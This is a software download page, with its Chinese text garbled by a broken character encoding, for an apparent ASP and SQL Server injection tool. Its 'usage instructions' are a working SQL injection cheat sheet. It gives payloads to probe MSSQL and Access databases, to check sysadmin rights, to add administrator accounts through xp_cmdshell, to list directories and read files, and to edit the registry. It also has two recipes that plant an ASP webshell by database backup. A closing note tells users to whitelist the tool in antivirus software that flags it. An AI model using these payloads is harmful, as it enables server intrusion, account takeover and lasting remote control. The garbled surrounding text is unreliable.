Èí¼þ´óС£º1.03MB | Èí¼þÓïÑÔ£º¼òÌåÖÐÎÄ |
Èí¼þÊÚȨ£ºÂÌÉ«°æ | Èí¼þÀà±ð£ºÍøÂç¼ì²â |
Èí¼þµÈ¼¶£º | ¸üÐÂʱ¼ä£º2015-07-29 |
Ó¦ÓÃƽ̨£º/Win8/Win7/WinXP |
- Èí¼þ½éÉÜ
- Èí¼þ½Øͼ
- Ïà¹ØÔĶÁ
- ÏÂÔصØÖ·
Íøվ©¶´¼ì²â¹¤¾ßÊÇÒ»¿î¹¦ÄÜÇ¿´óµÄÍøվ©¶´¼ì²âÈí¼þ¡£Íøվ©¶´¼ì²â¹¤¾ßÄÜ°ïÖúÍøÕ¾¹ÜÀíÕß¿ìËÙµÄÕÒ³öÍøÕ¾ÖдæÔڵĸ÷ÖÖ©¶´£¬ÒÔ±ã½øÐÐÐÞ¸´£¬¶Å¾øÍøÕ¾ÖеÄÊý¾Ý±»µÁÈ¡¡£ÍƼö¸÷λվ³¤´óÈË¿ÉÒÔÏÂÀ´¼ì²âÍøÕ¾ÊÇ·ñ´æÔÚ©¶´£¬±ÜÃâÒòÕâЩ©¶´ÒýÆð²»±ØÒªµÄËðʧ¡£
Íøվ©¶´¼ì²â¹¤¾ß¼ò½é£º
Íøվ©¶´¼ì²â¹¤¾ßÓÉVBÓïÑÔ±àдµÄÍøվ©¶´¼ì²â¹¤¾ßµÄÃû³Æ£¬ASP×¢È멶´¼ì²â¹¤¾ß£¬ÌرðÔÚSQL Server×¢Èë¼ì²â·½ÃæÓм«¸ßµÄ׼ȷÂÊ¡£
Íøվ©¶´¼ì²â¹¤¾ßʹÓÃ˵Ã÷£º
1.ÅжÏÊÇ·ñÓÐ×¢Èë
;and 1=1
;and 1=2
2.³õ²½ÅжÏÊÇ·ñÊÇmssql
;and user>0
3.ÅжÏÊý¾Ý¿âϵͳ
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.×¢Èë²ÎÊýÊÇ×Ö·û
'and [²éѯÌõ¼þ] and ''='
5.ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ
'and [²éѯÌõ¼þ] and '%25'='
6.²ÂÊý¾Ý¿â
;and (Select Count(*) from [Êý¾Ý¿âÃû])>0
7.²Â×Ö¶Î
;and (Select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
8.²Â×Ö¶ÎÖмǼ³¤¶È
;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
9.(1)²Â×ֶεÄasciiÖµ(access)
;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
(2)²Â×ֶεÄasciiÖµ(mssql)
;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
10.²âÊÔȨÏ޽ṹ(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.Ìí¼ÓmssqlºÍϵͳµÄÕÊ»§
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)±éÀúĿ¼
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('Éϲ½µÃµ½µÄpaths'))>)
(2)±éÀúĿ¼
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- »ñµÃµ±Ç°ËùÓÐÇý¶¯Æ÷
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- »ñµÃ×ÓĿ¼Áбí
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- »ñµÃËùÓÐ×ÓĿ¼µÄĿ¼Ê÷½á¹¹
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- ²é¿´ÎļþµÄÄÚÈÝ
13.mssqlÖеĴ洢¹ý³Ì
xp_regenumvalues ×¢²á±í¸ù¼ü, ×Ó¼ü
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' ÒÔ¶à¸ö¼Ç¼¼¯·½Ê½·µ»ØËùÓмüÖµ
xp_regread ¸ù¼ü,×Ó¼ü,¼üÖµÃû
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'CommonFilesDir' ·µ»ØÖƶ¨¼üµÄÖµ
xp_regwrite ¸ù¼ü,×Ó¼ü, ÖµÃû, ÖµÀàÐÍ, Öµ
ÖµÀàÐÍÓÐ2ÖÖREG_SZ ±íʾ×Ö·ûÐÍ,REG_DWORD ±íʾÕûÐÍ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName','reg_sz','hello' дÈë×¢²á±í
xp_regdeletevalue ¸ù¼ü,×Ó¼ü,ÖµÃû
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName' ɾ³ýij¸öÖµ
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' ɾ³ý¼ü,°üÀ¨¸Ã¼üÏÂËùÓÐÖµ
14.mssqlµÄbackup´´½¨webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';
15.mssqlÄÚÖú¯Êý
;and (select @@version)>0 »ñµÃWindowsµÄ°æ±¾ºÅ
;and user_name()='dbo' Åжϵ±Ç°ÏµÍ³µÄÁ¬½ÓÓû§ÊDz»ÊÇsa
;and (select user_name())>0 ±¬µ±Ç°ÏµÍ³µÄÁ¬½ÓÓû§
;and (select db_name())>0 µÃµ½µ±Ç°Á¬½ÓµÄÊý¾Ý¿â
16.¼ò½àµÄwebshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
ÇëÇóµÄʱºò£¬ÏñÕâÑù×ÓÓãº
http://ip/l.asp?c=dir
×¢ÒâÊÂÏî
±¾Èí¼þ±»360±¨¶¾£¬Çë×ÔÐÐÕå×ã¬ÈçÐèʹÓÃÇ뽫Èí¼þ¼ÓÈë360ÐÅÈÎÁÐ±í¡£
Ïà¹ØÈí¼þ
- Pano2VRÈ«¾°Í¼ÖÆ×÷½Ì³Ì ÖÆ×÷360¶ÈÈ«¾°Ð§¹ûͼµÄ·½·¨
- Word±í¸ñ½ð¶îСд±ä´óд·½·¨ Á½ÖÖ·½·¨ÊµÏÖ
- ѹËõ±¦ÔõôʹÓà ¼¸¸ö²½ÖèÇáËÉѹ
- WordÎĵµÔõô²ð·Ö³É¶à¸öÎĵµ ¼¸¸ö²½Öè¾ÍÄܸ㶨
- ÕûºÏ£¡»ðɽСÊÓƵÉý¼¶Îª¶¶Òô»ðɽ°æ
- AutoCAD2020Ôõô»æÖÆÈý½ÇÐÎ Ìî³äÈý½ÇÐν̳Ì
- AutoCAD2020ÔõôÉèÖÃË«Ïß Ë«Ïß¾àÀëÉèÖý̳Ì
- °ÁÈí¿ÙͼÔõôÓà ¼¸¸ö²½ÖèÇáËÉ¿Ùͼ
- Word±í¸ñÔõô×Ô¶¯Ìî³ä Ò»¸öÉèÖø㶨
- ÈýÐÇ·¢²¼ÊúÆðÀ´·Å´ó°æ¡°ÊÖ»ú¡±£ºÕâ¿îÐýתµçÊÓÓÐÒâ˼